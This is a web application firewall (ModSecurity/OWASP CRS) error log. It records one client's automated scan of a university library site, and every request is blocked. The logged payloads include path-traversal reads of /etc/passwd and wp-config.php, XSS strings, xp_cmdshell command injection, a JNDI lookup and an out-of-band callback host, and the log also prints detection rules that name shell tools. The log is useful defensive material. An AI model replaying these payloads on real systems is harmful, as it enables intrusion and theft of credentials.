[Tue Aug 29 11:45:05.396648 2023] [:error] [pid 2166] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/index.php"] [unique_id "ZO130cCo-f0AAAh2H2gAAAA0"]
[Tue Aug 29 11:45:06.367262 2023] [:error] [pid 2029] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:{\\r\\n   "type":"read",\\r\\n   "mbean":"java.lang:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22,\\x0d\\x0a   \\x22 found within ARGS:{\\x5cr\\x5cn   \\x22type\\x22:\\x22read\\x22,\\x5cr\\x5cn   \\x22mbean\\x22:\\x22java.lang:type: Memory\\x22,\\x0d\\x0a   \\x22target\\x22:{\\x0d\\x0a      \\x22url\\x22:\\x22service:jmx:rmi:///jndi/ldap://127.0.0.1:1389/o=tomcat\\x22\\x0d\\x0a   }\\x0d\\x0a}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/jolokia/read/getDiagnosticOptions"] [unique_id "ZO130sCo-f0AAAftVIgAAAAf"]
[Tue Aug 29 11:45:07.356519 2023] [:error] [pid 2165] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:patron_only_image. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:patron_only_image: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/"] [unique_id "ZO1308Co-f0AAAh13uMAAAAz"]
[Tue Aug 29 11:45:10.414257 2023] [:error] [pid 2099] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:chemin. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:chemin: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/opac_css/getgif.php"] [unique_id "ZO131sCo-f0AAAgzyS4AAAAF"]
[Tue Aug 29 11:45:11.406142 2023] [:error] [pid 2170] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:chemin. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:chemin: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/pmb/opac_css/getgif.php"] [unique_id "ZO1318Co-f0AAAh6rJ8AAAA4"]
[Tue Aug 29 11:45:12.379333 2023] [:error] [pid 2131] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:id: ../../Conf/config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/index.php"] [unique_id "ZO132MCo-f0AAAhT3wkAAAAD"]
[Tue Aug 29 11:45:13.402776 2023] [:error] [pid 2016] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:uid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )\\x0d\\x0a# found within ARGS:uid: ,chr(97)) or 1: print chr(121) chr(101) chr(115)\\x0d\\x0a#"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/audit/gui_detail_view.php"] [unique_id "ZO132cCo-f0AAAfg77kAAAAe"]
[Tue Aug 29 11:45:15.389234 2023] [:error] [pid 2159] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:keys. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ))}{ found within ARGS:keys: {if:array_map(base_convert(27440799224,10,32),array(1))}{end if}\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/search/"] [unique_id "ZO1328Co-f0AAAhvjWEAAAAs"]
[Tue Aug 29 11:45:16.405329 2023] [:error] [pid 2148] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:mailbox. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:mailbox: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "perpustakaan.unla.ac.id"] [uri "/src/read_body.php"] [unique_id "ZO133MCo-f0AAAhkLfYAAAAh"]
[Tue Aug 29 11:45:17.360053 2023] [:error] [pid 2111] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:mailbox. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:mailbox: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "perpustakaan.unla.ac.id"] [uri "/src/download.php"] [unique_id "ZO133cCo-f0AAAg-pOkAAAAR"]
[Tue Aug 29 11:45:17.407753 2023] [:error] [pid 2111] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/index.php"] [unique_id "ZO133cCo-f0AAAg-pOsAAAAR"]
[Tue Aug 29 11:45:19.376072 2023] [:error] [pid 2158] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:page: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/index.php"] [unique_id "ZO1338Co-f0AAAhuixoAAAAr"]
[Tue Aug 29 11:45:20.420439 2023] [:error] [pid 2148] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:url: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-content/plugins/phpfreechat/lib/csstidy-1.2/css_optimiser.php"] [unique_id "ZO134MCo-f0AAAhkLfwAAAAh"]
[Tue Aug 29 11:45:23.369059 2023] [:error] [pid 2099] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x5c..\\x5c found within ARGS:dir: http\\x5c..\\x5cadmin\\x5clogin\\x5clogin_check.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/include/thumb.php"] [unique_id "ZO1348Co-f0AAAgzyUEAAAAF"]
[Tue Aug 29 11:45:24.371013 2023] [:error] [pid 1129] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:script. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ..././..././..././..././..././..././..././..././..././..././ found within ARGS:script: ..././..././..././..././..././..././..././..././..././..././etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/webmail/old/calendar/minimizer/index.php"] [unique_id "ZO135MCo-f0AAARphLYAAAAU"]
[Tue Aug 29 11:45:24.372773 2023] [:error] [pid 2108] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/index.php"] [unique_id "ZO135MCo-f0AAAg8a9AAAAAK"]
[Tue Aug 29 11:45:25.387913 2023] [:error] [pid 2157] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:base. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:base: ../../../../../../../../../../"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/manage/log/view"] [unique_id "ZO135cCo-f0AAAhtjdMAAAAq"]
[Tue Aug 29 11:45:25.416023 2023] [:error] [pid 2018] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:layout. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:layout: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "perpustakaan.unla.ac.id"] [uri "/"] [unique_id "ZO135cCo-f0AAAfiYvAAAAAg"]
[Tue Aug 29 11:45:25.416640 2023] [:error] [pid 2111] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:style. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ..././..././..././..././..././..././..././..././..././..././ found within ARGS:style: ..././..././..././..././..././..././..././..././..././..././etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/webmail/old/calendar/minimizer/index.php"] [unique_id "ZO135cCo-f0AAAg-pPUAAAAR"]
[Tue Aug 29 11:45:26.380037 2023] [:error] [pid 2161] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:base. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:base: ../../../../../../../../../../"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/log/view"] [unique_id "ZO135sCo-f0AAAhxwncAAAAv"]
[Tue Aug 29 11:45:27.398835 2023] [:error] [pid 2158] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:base. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:base: ../../../../../../../../../../"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/manage/log/view"] [unique_id "ZO1358Co-f0AAAhuiyUAAAAr"]
[Tue Aug 29 11:45:28.431734 2023] [:error] [pid 2149] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:base. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:base: ../../../../../../../../../../"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/log/view"] [unique_id "ZO136MCo-f0AAAhlz5YAAAAi"]
[Tue Aug 29 11:45:29.376362 2023] [:error] [pid 2158] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:Language_S. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:Language_S: ../../Data/CONFIG/CasDbCnn.dat"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/casmain.xgi"] [unique_id "ZO136cCo-f0AAAhuiykAAAAr"]
[Tue Aug 29 11:45:30.393172 2023] [:error] [pid 2011] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dbPath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:dbPath: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/systemController/showOrDownByurl.do"] [unique_id "ZO136sCo-f0AAAfbkxsAAAAZ"]
[Tue Aug 29 11:45:31.416589 2023] [:error] [pid 2165] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:docDownloadPath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:docDownloadPath: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "perpustakaan.unla.ac.id"] [uri "/WealthT24/GetImage"] [unique_id "ZO1368Co-f0AAAh13xQAAAAz"]
[Tue Aug 29 11:45:35.475483 2023] [:error] [pid 2155] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at XML. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within XML:  exec master.dbo.xp_cmdshell/bin/bash -c cat/etc/passwd "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "perpustakaan.unla.ac.id"] [uri "/ioffice/prg/set/wss/ioAssistance.asmx"] [unique_id "ZO1378Co-f0AAAhrqKEAAAAo"]
[Tue Aug 29 11:45:36.626371 2023] [:error] [pid 2165] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\b(?:(?:n(?:map|et|c)|w(?:guest|sh)|telnet|rcmd|ftp)\\\\.exe\\\\b|cmd(?:(?:32)?\\\\.exe\\\\b|\\\\b\\\\W*?\\\\/c))" at XML. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "213"] [id "950002"] [rev "3"] [msg "System Command Access"] [data "Matched Data: cmd/c found within XML:  exec master.dbo.xp_cmdshell cmd/c ipconfig "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/ioffice/prg/set/wss/ioAssistance.asmx"] [unique_id "ZO138MCo-f0AAAh13yMAAAAz"]
[Tue Aug 29 11:45:43.919909 2023] [:error] [pid 2131] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnbitjmimt14dgn26gsmd4yuhwz3ba9.oast.site found within TX:1: cjmnbitjmimt14dgn26gsmd4yuhwz3ba9.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "perpustakaan.unla.ac.id"] [uri "/v1/avatars/favicon"] [unique_id "ZO1398Co-f0AAAhT30kAAAAD"]
[Tue Aug 29 11:45:47.435212 2023] [:error] [pid 2223] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../ found within ARGS:file: /../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-content/plugins/wordfence/lib/wordfenceClass.php"] [unique_id "ZO13@8Co-f0AAAiv-x4AAAAJ"]
[Tue Aug 29 11:45:48.529571 2023] [:error] [pid 2229] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:obj_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:obj_name: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/Visitor/bin/WebStrings.srf"] [unique_id "ZO13-MCo-f0AAAi1yTMAAAAM"]
[Tue Aug 29 11:45:48.973129 2023] [:error] [pid 2231] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:fileName: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-content/plugins/candidate-application-form/downloadpdffile.php"] [unique_id "ZO13-MCo-f0AAAi3ZzIAAAAP"]
[Tue Aug 29 11:45:50.547734 2023] [:error] [pid 2232] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:eeFile. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:eeFile: ../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-content/plugins/simple-file-list/includes/ee-downloader.php"] [unique_id "ZO13-sCo-f0AAAi4NEEAAAAQ"]
[Tue Aug 29 11:45:51.379285 2023] [:error] [pid 1988] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:Path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../../../ found within ARGS:Path: Classes/../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/XMII/Catalog"] [unique_id "ZO13-8Co-f0AAAfEB4EAAAAO"]
[Tue Aug 29 11:45:56.371347 2023] [:error] [pid 2002] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:file: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-content/plugins/localize-my-post/ajax/include.php"] [unique_id "ZO14BMCo-f0AAAfSWnAAAAAB"]
[Tue Aug 29 11:46:01.401008 2023] [:error] [pid 2149] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data:  found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/SolarWinds/InformationService/v3/Json/Query"] [unique_id "ZO14CcCo-f0AAAhlz@UAAAAi"]
[Tue Aug 29 11:46:02.365124 2023] [:error] [pid 2238] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:where. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: = found within ARGS:where: place\\x22><svg onload=confirm(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "perpustakaan.unla.ac.id"] [uri "/7/0/33/1d/www.citysearch.com/search"] [unique_id "ZO14CsCo-f0AAAi@S-kAAAAM"]
